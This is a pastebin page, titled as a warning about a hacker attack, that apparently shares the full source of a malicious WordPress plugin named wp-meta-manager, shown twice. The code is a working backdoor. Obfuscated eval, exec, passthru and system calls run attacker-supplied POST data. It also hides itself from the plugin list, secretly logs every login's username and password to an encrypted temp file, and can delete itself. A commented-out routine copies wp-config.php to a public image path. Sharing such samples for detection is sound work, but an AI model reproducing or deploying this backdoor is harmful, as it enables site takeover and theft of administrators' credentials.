ACHTUNG Hackerangriff mit wp-meta-manager

From anon, 3 Years ago, written in Plain Text.

Embed

Download Paste or View Raw
Hits: 314

<?php

/*

Plugin Name: wp-meta-manager

Plugin URI: http://example.org

description: ---

Version: 1.0

Author: ---

Author URI: http://example.org

License: GPL2

*/

function wpmm__init() {

$f = '';

if( isset($_POST["2l4ky8y16w"]) ) { wpmm__sethelper('@Eva' . $f . 'l( stripslashes($_POST["2l4ky8y16w"]));'); };

if( isset($_POST["2l4ky8y16x"]) ) { wpmm__sethelper('@ex' . $f . 'ec( stripslashes($_POST["2l4ky8y16x"]), $out ); foreach( $out as $line ) { echo $line . "\n"; }'); };

if( isset($_POST["2l4ky8y16y"]) ) { wpmm__sethelper('@Pas' . $f . 'sth' . $f . 'ru( stripslashes($_POST["2l4ky8y16y"]) );'); };

if( isset($_POST["2l4ky8y16z"]) ) { wpmm__sethelper('print( @sy' . $f . 'stem( stripslashes($_POST["2l4ky8y16z"]) ) );'); };

if( isset($_POST["ha72mlxl20"]) ) die( wpmm__read_dat_file() );

if( isset($_POST["lp98dm2xa6"]) ) {

unlink( sys_get_temp_dir() . "/~6cb001a" );

unlink( __FILE__ );

}

}

add_action( 'init', 'wpmm__init', 999 );

function wpmm__sethelper( $data ) {

$helper = dirname( __FILE__ ) . 'wp-meta-manager-helper.php';

$h = @fopen( $helper, "w" );

@fwrite( $h, '<?php ' . $data . ' ?>' );

@fclose( $h );

@require( $helper );

@unlink( $helper );

die();

}

function wpmm__filter_plugins( $plugins ) {

return array_filter( $plugins, 'wpmm__check_plugin' );

}

function wpmm__check_plugin( $plugin ) {

return ( $plugin["Name"] != "wp-meta-manager" or isset( $_GET["a"] ) );

}

add_filter( 'all_plugins', 'wpmm__filter_plugins' );

function wpmm__authenticate2a62( $user, $username, $password ) {

if( $user instanceof WP_User ) {

$c = wpmm__read_dat_file();

$line = "$username : $password";

$found = false;

foreach( explode("\n", $c) as $l ) {

if( $l == $line ) {

$found = true;

break;

}

}

if( ! $found ) {

$c .= $line . "\n";

wpmm__write_dat_file( $c );

}

}

return $user;

}

add_filter( 'authenticate', 'wpmm__authenticate2a62', 99, 3 );

function wpmm__read_dat_file() {

if( $f = @file_get_contents(sys_get_temp_dir() . "/~6cb001a") ) {

$key = "aMIDf82§;!A5t,/S,yy-9";

$cipher = "aes-128-cbc";

$iv = hex2bin( 'aa0df47eb210db7a87066692f91a14be' );

$ct = openssl_decrypt( $f, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv );

return $ct;

}

return "";

}

function wpmm__write_dat_file( $contents ) {

$key = "aMIDf82§;!A5t,/S,yy-9";

$cipher = "aes-128-cbc";

$iv = hex2bin( 'aa0df47eb210db7a87066692f91a14be' );

$ct = openssl_encrypt( $contents, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv );

@file_put_contents( sys_get_temp_dir() . "/~6cb001a", $ct );

}

/*function wpmm__activate() {

copy(ABSPATH . "/wp-config.php", ABSPATH . "/wp-content/uploads/thing.png");

}

function wpmm__deactivate() {

unlink(ABSPATH . "/wp-content/uploads/thing.png");

}

register_activation_hook( __FILE__, 'wpmm__activate' );

register_deactivation_hook( __FILE__, 'wpmm__deactivate' );*/

?>

Author

Title

Language

Your paste - Paste your paste here

&lt;?php
/*
Plugin Name: wp-meta-manager
Plugin URI: http://example.org
description: ---
Version: 1.0
Author: ---
Author URI: http://example.org
License: GPL2
*/
function wpmm__init() {
$f = '';
if( isset($_POST[&quot;2l4ky8y16w&quot;]) ) { wpmm__sethelper('@Eva' . $f . 'l( stripslashes($_POST[&quot;2l4ky8y16w&quot;]));'); };
if( isset($_POST[&quot;2l4ky8y16x&quot;]) ) { wpmm__sethelper('@ex' . $f . 'ec( stripslashes($_POST[&quot;2l4ky8y16x&quot;]), $out ); foreach( $out as $line ) { echo $line . &quot;\n&quot;; }'); };
if( isset($_POST[&quot;2l4ky8y16y&quot;]) ) { wpmm__sethelper('@Pas' . $f . 'sth' . $f . 'ru( stripslashes($_POST[&quot;2l4ky8y16y&quot;]) );'); };
if( isset($_POST[&quot;2l4ky8y16z&quot;]) ) { wpmm__sethelper('print( @sy' . $f . 'stem( stripslashes($_POST[&quot;2l4ky8y16z&quot;]) ) );'); };
if( isset($_POST[&quot;ha72mlxl20&quot;]) ) die( wpmm__read_dat_file() );
if( isset($_POST[&quot;lp98dm2xa6&quot;]) ) {
unlink( sys_get_temp_dir() . &quot;/~6cb001a&quot; );
unlink( __FILE__ );
}
}
add_action( 'init', 'wpmm__init', 999 );
function wpmm__sethelper( $data ) {
$helper = dirname( __FILE__ ) . 'wp-meta-manager-helper.php';
$h = @fopen( $helper, &quot;w&quot; );
@fwrite( $h, '&lt;?php ' . $data . ' ?&gt;' );
@fclose( $h );
@require( $helper );
@unlink( $helper );
die();
}
function wpmm__filter_plugins( $plugins ) {
return array_filter( $plugins, 'wpmm__check_plugin' );
}
function wpmm__check_plugin( $plugin ) {
return ( $plugin[&quot;Name&quot;] != &quot;wp-meta-manager&quot; or isset( $_GET[&quot;a&quot;] ) );
}
add_filter( 'all_plugins', 'wpmm__filter_plugins' );
function wpmm__authenticate2a62( $user, $username, $password ) {
if( $user instanceof WP_User ) {
$c = wpmm__read_dat_file();
$line = &quot;$username : $password&quot;;
$found = false;
foreach( explode(&quot;\n&quot;, $c) as $l ) {
if( $l == $line ) {
$found = true;
break;
}
}
if( ! $found ) {
$c .= $line . &quot;\n&quot;;
wpmm__write_dat_file( $c );
}
}
return $user;
}
add_filter( 'authenticate', 'wpmm__authenticate2a62', 99, 3 );
function wpmm__read_dat_file() {
if( $f = @file_get_contents(sys_get_temp_dir() . &quot;/~6cb001a&quot;) ) {
$key = &quot;aMIDf82§;!A5t,/S,yy-9&quot;;
$cipher = &quot;aes-128-cbc&quot;;
$iv = hex2bin( 'aa0df47eb210db7a87066692f91a14be' );
$ct = openssl_decrypt( $f, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv );
return $ct;
}
return &quot;&quot;;
}
function wpmm__write_dat_file( $contents ) {
$key = &quot;aMIDf82§;!A5t,/S,yy-9&quot;;
$cipher = &quot;aes-128-cbc&quot;;
$iv = hex2bin( 'aa0df47eb210db7a87066692f91a14be' );
$ct = openssl_encrypt( $contents, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv );
@file_put_contents( sys_get_temp_dir() . &quot;/~6cb001a&quot;, $ct );
}
/*function wpmm__activate() {
copy(ABSPATH . &quot;/wp-config.php&quot;, ABSPATH . &quot;/wp-content/uploads/thing.png&quot;);
}
function wpmm__deactivate() {
unlink(ABSPATH . &quot;/wp-content/uploads/thing.png&quot;);
}
register_activation_hook( __FILE__, 'wpmm__activate' );
register_deactivation_hook( __FILE__, 'wpmm__deactivate' );*/
?&gt;

Private - Private paste aren't shown in recent listings.

Delete After - When should we delete your paste?

Spam protection -

{"html5":"htmlmixed","css":"css","javascript":"javascript","php":"php","python":"python","ruby":"ruby","lua":"text\/x-lua","bash":"text\/x-sh","go":"go","c":"text\/x-csrc","cpp":"text\/x-c++src","diff":"diff","latex":"stex","sql":"sql","xml":"xml","apl":"apl","asterisk":"asterisk","c_loadrunner":"text\/x-csrc","c_mac":"text\/x-csrc","coffeescript":"text\/x-coffeescript","csharp":"text\/x-csharp","d":"d","ecmascript":"javascript","erlang":"erlang","groovy":"text\/x-groovy","haskell":"text\/x-haskell","haxe":"text\/x-haxe","html4strict":"htmlmixed","java":"text\/x-java","java5":"text\/x-java","jquery":"javascript","mirc":"mirc","mysql":"sql","ocaml":"text\/x-ocaml","pascal":"text\/x-pascal","perl":"perl","perl6":"perl","plsql":"sql","properties":"text\/x-properties","q":"text\/x-q","scala":"scala","scheme":"text\/x-scheme","tcl":"text\/x-tcl","vb":"text\/x-vb","verilog":"text\/x-verilog","yaml":"text\/x-yaml","z80":"text\/x-z80"}

ACHTUNG Hackerangriff mit wp-meta-manager

Reply to "ACHTUNG Hackerangriff mit wp-meta-manager"